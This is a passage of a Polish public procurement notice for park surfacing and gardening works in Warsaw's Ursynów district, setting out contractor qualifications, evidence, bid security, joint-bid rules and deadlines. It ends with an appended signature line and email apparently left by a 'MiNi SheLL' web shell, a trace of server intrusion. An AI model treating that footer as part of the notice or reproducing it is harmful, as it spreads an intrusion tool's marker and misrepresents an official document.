zastrzeżeniem art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane(t. j. Dz. U. 2023 poz. 682);<br/>	W zakresie prac ogrodniczych, co najmniej jedną osobą (przy czym Zamawiający dopuszcza łączenie poniższych funkcji przez jedną osobę):<br/><br/>c.4. wyznaczoną do kierowania pracami ogrodniczymi posiadającą:<br/>a)	wykształcenie wyższe o kierunku przyrodniczym (w szczególności: ogrodnictwo, architektura krajobrazu, leśnictwo, ochrona środowiska, ochrona zdrowia roślin, ogrodnictwo miejskie i arborystyka, rolnictwo, inżynieria ekologiczna, biologia) <br/>albo <br/>wykształcenie średnie techniczne o kierunku „ogrodnictwo” lub „architektura krajobrazu”. Uznawane będą również kierunki pokrewne lub o podobnym zakresie występujące pod inną nazwą;<br/>b)	doświadczenie w kierowaniu pracami ogrodniczymi przy zagospodarowywaniu publicznego terenu zieleni wraz z pielęgnacją drzewostanu zdobyte w okresie ostatnich 5 lat przed upływem terminu składania ofert, przy realizacji co najmniej 4 zadań/inwestycji, w ramach których prowadzono prace polegające na kierowaniu pracami ogrodniczymi przy zagospodarowywaniu publicznego terenu zieleni wraz z pielęgnacją drzewostanu, (uwzględniającego pielęgnację drzewostanu);<br/>c.5. wyznaczoną do koordynacji spraw ochrony przyrody posiadającą:<br/>a)	wykształcenie wyższe o kierunku przyrodniczym (w szczególności: ochrona środowiska, ochrona zdrowia roślin, inżynieria ekologiczna, biologia, zootechnika, bioinżynieria zwierząt, hodowla i ochrona zwierząt towarzyszących i dzikich). Uznawane będą również kierunki pokrewne lub o podobnym zakresie występujące pod inną nazwą. <br/>b)	doświadczenie w prowadzeniu nadzorów przyrodniczych w zakresie ochrony siedlisk przyrodniczych i gatunków chronionych oraz zgodności prowadzonych prac z przepisami dot. ochrony środowiska, przy realizacji co najmniej dwóch inwestycji (2 zleceń), przy czym każda z tych inwestycji obejmowała budowę publicznego terenu zieleni3.<br/><br/>UWAGA 2:<br/>Z uwagi na zastrzeżenie osobistego wykonania kluczowych części zamówienia obejmujących budowę nawierzchni Wykonawca może powoływać się na zdolności podmiotu udostępniającego zasoby, na zasadach określonych w art. 118 ust. 1 ustawy Pzp, jedynie w celu wykazania spełniania warunków udziału w postępowaniu określonych w pkt 14 ppkt 4) lit. b) oraz c) od c.4. do c.5. SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz oświadczeń lub dokumentów, jakie na wezwanie Zamawiającego mają dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu – podmiotowe środki dowodowe:<br/>1)	wykaz wykonanych robót budowlanych oraz wykonanych/wykonywanych usług (zgodny z załącznikiem nr 4 do SWZ) wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane / usługi zostały wykonane należycie, przy czym dowodami o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty;<br/>Uwaga!<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych i/ lub usług, wykonywanych wspólnie z innymi wykonawcami wykaz, o którym mowa w pkt 17 ppkt. 1) SWZ dotyczy robót budowlanych/usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/>2)	wykaz osób (zgodny z załącznikiem nr 5 do SWZ) skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych kierowanie robotami budowlanymi oraz pracami ogrodniczymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca zobowiązany jest, przed upływem terminu składania ofert, wnieść wadium w kwocie: 25 000,00 zł. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oferta wspólna:<br/>Zamawiający dopuszcza możliwość składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia tj. spółki cywilne lub konsorcja (tj. dwóch lub więcej Wykonawców) w ramach oferty wspólnej w rozumieniu art.<br/>58 ustawy pod warunkiem, że taka oferta spełniać będzie następujące wymagania:<br/>1) Wykonawcy występujący wspólnie są zobowiązani do ustanowienia Pełnomocnika do reprezentowania ich w<br/>postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia<br/>publicznego.<br/>2) Pełnomocnictwo powinno zawierać w szczególności wskazanie:<br/>• postępowania o zamówienie publiczne, którego dotyczy,<br/>• wszystkich Wykonawców ubiegających się wspólnie udzielenie zamówienia wymienionych z nazwy z określeniem adresu<br/>siedziby,<br/>• ustanowionego Pełnomocnika oraz zakresu jego umocowania.<br/>3) Dokument pełnomocnictwa musi być podpisany przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia,<br/>przy czym nie jest wymagany podpis pełnomocnika. Podpisy muszą być złożone przez osoby uprawnione do składania<br/>oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców.<br/>4) Z uwagi na zastrzeżenie osobistego wykonania kluczowych części zamówienia obejmujących budowę nawierzchni,<br/>zgodnie z art. 60 ust. 1 ustawy Pzp, jeden z Wykonawców zobowiązany jest do osobistego (siłami własnymi) wykonania<br/>zastrzeżonej części zamówienia, za jakie uznaje się roboty budowlane związane z budową nawierzchni mineralnych. Tym<br/>samym w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, o których<br/>mowa w pkt 14 ppkt 4) lit. a) oraz c) od c.1. do c.3. SWZ, wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>mogą polegać na zdolnościach tych z wykonawców, którzy wykonają zastrzeżone do osobistego wykonania roboty<br/>budowlane, do realizacji których te zdolności są wymagane.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, o których mowa w pkt.<br/>14 ppkt 4) lit. b) oraz c) od c.4. do c.5. SWZ, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane.<br/>5) W przypadku, o którym mowa w pkt. 4) wykonawcy wspólnie ubiegający się o udzielenie zamówienia zgodnie z art. 117<br/>ust. 4 ustawy Pzp, dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane/usługi wykonają<br/>poszczególni wykonawcy (wg załącznika nr 2 do SWZ).<br/>6) Oświadczenie, o którym mowa w pkt. 15 ppkt. 2) SWZ składa każdy z wykonawców wspólnie ubiegających się o<br/>zamówienie. Oświadczenie to potwierdza brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu, w<br/>zakresie, w jakim każdy z wykonawców wskazuje spełnienie warunków udziału w postępowaniu.<br/>7) Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z pełnomocnikiem. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> W odniesieniu do art. 455 ust.1 ustawy Prawo zamówień publicznych - Zamawiający zastrzega sobie możliwość zmiany warunków umowy na etapie jej realizacji w przypadkach określonych w projektowanych postanowieniach umowy stanowiących Załącznik nr 3 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty srodowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-03-25 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-03-25 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-04-23</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Osobami uprawnionymi do porozumiewania się z Wykonawcami są:<br/>- w zakresie dotyczącym przedmiotu zamówienia:<br/>Martyna Korzeniecka – główny specjalista w Wydziale Infrastruktury<br/> - w zakresie dotyczącym zagadnień formalno-prawnych:<br/> Elżbieta Kanabus – podinspektor w Wydziale Zamówień Publicznych,<br/>e-mail: ursynow.wzp@um.warszawa.pl<br/>2. Termin wykonania zamówienia: od dnia zawarcia umowy do dnia 10.12.2026, a w tym:<br/>a) Etap I: w terminie 240 dni od dnia zawarcia umowy tj. do dnia ……………………..<br/>b) Etap II: w terminie 24 miesięcy od dnia odbioru końcowego Etapu I, nie później niż do dnia 10.12.2026 r.<br/>3. Zamawiający zastrzega obowiązek osobistego wykonania przez Wykonawcę kluczowych części zamówienia,<br/>obejmujących roboty budowlane związane z budową nawierzchni mineralnych. Tym samym Wykonawca, a w przypadku<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia jeden z wykonawców wspólnie ubiegających się o<br/>zamówienia jest zobowiązany do osobistego (siłami własnymi) wykonania kluczowych części zamówienia, za jakie uznaje<br/>się roboty budowlane polegające na budowie nawierzchni we wschodniej części Parku Przy Bażantarni w Warszawie.<br/>Szczegółowy zakres określony został w Opisie przedmiotu zamówienia stanowiącego załącznik nr 6a do SWZ. Wartość<br/>robót dotyczących zastrzeżenia opiewa na 16% wyceny inwestorskiej w zakresie podstawowym (rozszerzenie zakresu<br/>przewidziane jako zamówienie podobne), a więc stanowi znaczną część robót planowanych do wykonania (55% roboty,<br/>28% usługi, 16% dostawy). Ponadto projekt wskazuje na nietypową technologię wykonania nawierzchni ziemnych<br/>(mineralnych), które będą wykonane w formie nasypu, w sztucznie utworzonym korycie (typowo nawierzchnie wykonuje się<br/>w korycie gruntu rodzimego), uniemożliwiającym rozsuwanie się warstw nawierzchni i umożliwiającym spadkowe<br/>odprowadzanie wody. Przyjęta technologia nie jest powszechna ani powtarzalna – ze względu na trudne warunki terenowe<br/>(gęste zadrzewienie) należy wykonać nasyp celem nienaruszenia statyki drzew.<br/>W odniesieniu do kluczowych zadań zastrzeżonych do osobistego wykonania przez Wykonawcę, Wykonawca nie może<br/>powoływać się na zdolności podmiotu udostępniającego zasoby, na zasadach określonych w art. 118 ust. 1 ustawy Pzp, w<br/>celu wykazania spełniania warunków udziału w postępowaniu określonych w pkt 14 ppkt 4) lit. a) oraz c) od c.1. do c.3.<br/>SWZ.<br/>4. Zamawiający wykluczy z postępowania Wykonawcę:<br/>a) w stosunku, do którego zachodzi którakolwiek z przesłanek wykluczenia określona w art. 108 ust. 1 ustawy Pzp;<br/>b) w stosunku, do którego zachodzi którakolwiek z przesłanek wykluczenia określona w art. 7 ust. 1 ustawy z dnia 13

Creat By MiNi SheLL
Email: jattceo@gmail.com